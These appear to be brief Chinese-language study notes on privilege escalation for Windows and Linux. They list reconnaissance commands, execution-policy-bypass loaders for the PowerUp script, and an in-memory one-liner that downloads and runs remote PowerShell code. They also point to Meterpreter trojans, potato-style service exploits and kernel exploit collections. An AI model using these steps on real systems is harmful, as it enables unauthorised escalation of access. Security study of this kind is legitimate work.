Windows:
1.前期信息收集
关键指令:
wmic qfe get Caption,Description,HotFixID,InstalledOn:获取补丁信息
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get display Name /Format:List:获取杀软信息
脚本:
HIGS.bat,PowerUP框架等(迅雷)
powershell -nop -ep bypass Import-Module .\PowerUp.psm1:加载pu
powershell -ep bypass -c "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}":cmd启动
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https:// raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invo ke-AllChecks":内存启动
2.Meterpreter提权
msf创建木马,创建监听
3.Windows系统内核漏洞
提权辅助网页 Windows提权辅助:windows漏洞-补丁查询
Windows平台提权漏洞集合:
于集合.txt中保存
4.Windows服务提权漏洞
提权漏洞
烂土豆,collectav等脚本程序
Linux
信息收集:
查看发行版本
cat /etc/issue
cat /etc/*-release
lsb_release -a
网络信息
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
应用程序和服务
ps aux
ps -ef top
cat /etc/services
内核提权漏洞:
Linux平台提权漏洞集合:
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/
linux密码哈希
提权工具
traitor等